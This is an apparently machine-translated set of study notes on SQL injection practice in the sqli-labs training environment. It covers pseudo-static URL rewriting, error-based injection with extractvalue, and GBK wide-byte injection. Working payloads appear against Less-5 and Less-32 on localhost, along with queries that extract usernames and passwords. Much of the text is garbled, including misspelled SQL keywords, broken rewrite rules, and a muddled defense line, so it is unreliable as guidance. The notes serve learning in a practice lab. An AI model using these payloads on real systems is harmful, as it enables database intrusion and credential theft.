10.24 pseudo-static pages, error injection, injection byte wide

Build a pseudo-static pages

http://www.test.com/index.php?id=1 (vulnerable)

http://www.test.com/index.html (static pages only display data, security is very high)

http://www.test.com/1.html

http://www.test.com/add_1.html

step

Step1 : rewrite mechanisms need to open the site, modify the configuration file, find

Rewrite_module modules LoadModule / mod_rewrite.so , remove the front of the Notes, and then need apache support to resolve htaccess file, modify the configuration file, find the " AllowOverride None ", will None changed to All , restart apache.

Step2：

New htaccess file, then write "Rewrite Rules"

RewriteEngine on

RewriteRule ([0-9] {1, }) \. Html $ index.php? Id = $ 1 // rewrite rules. ([0-9] {1}) $ Match $ 1 value, \ escape characters html $ indicates URL in is html end

 

Page http://127.0.0.1/weijingtai/2-add.html

Matching rule RewriteRule ([0-9] {1, }) - ([a-zA-Z] {1,}) \ html $ index.php id = $ 1¶ = $ 2.?

Request for the page: http://127.0.0.1/weijingtai/ index.php the above mentioned id = = 2¶ the Add?

 

Step injection error

Step1 : test injection point

Step2 : get database information (current database)

http://127.0.0.1/sqli-labs-master/Less-5/?id=2' and extractvalue(1,concat(0x7e,(database()),0x7e))%23+

Step3 : Table Name

Select tisinct table_name from information_shcema.tables where table_shcema=database() limit 0,1

Step4 : Gets the specified fields in the table

STEP5 : access to content

Select concat (username,’|’password)from users limit 0,1

Then you can go decryption

 

Byte wide injection

mysql_query ( "SET NAMES 'gbk' "); // set the character set encoding

mysql_set_charset ( "GBK"); // set the character set encoding

mysql_reak_escape_string () to escape filtration parameters, the function having a similar function are: addslaches () , mysql_escape_string () ( PHP5.3 after the abolition), magic quotes ( The magic_quotes_gpc ) module, for special symbol ' "\ null <> etc.

GBK coding: An encoding mode for the characters, a character encoded using two bytes

 

http://127.0.0.1/sqli-labs-master/Less-32/?id=-1%81' union select 1,user(),3%23

 

 

 

Byte wide Sqlilab32

http://127.0.0.1/sqli-labs-master/Less-32/?id=-1%81' union select 1,2,3%23

Defense: Use mysql_set_charset ( "GBK"); use mysql_escape_string escaped

 

PDO wide byte injection

PDO : connect to the database -> Settings template > Binding data > execute SQL statements

$conn->setAttribute(PDO::ATTR_EMULATE_PREPARES,false);

 

Injecting secondary coding

The browser will from once data in the form URL will default encoding after decoding, to reach the server

PHP in url decoding functions are: urldecoded () , rawurldecode ()

 

http header injection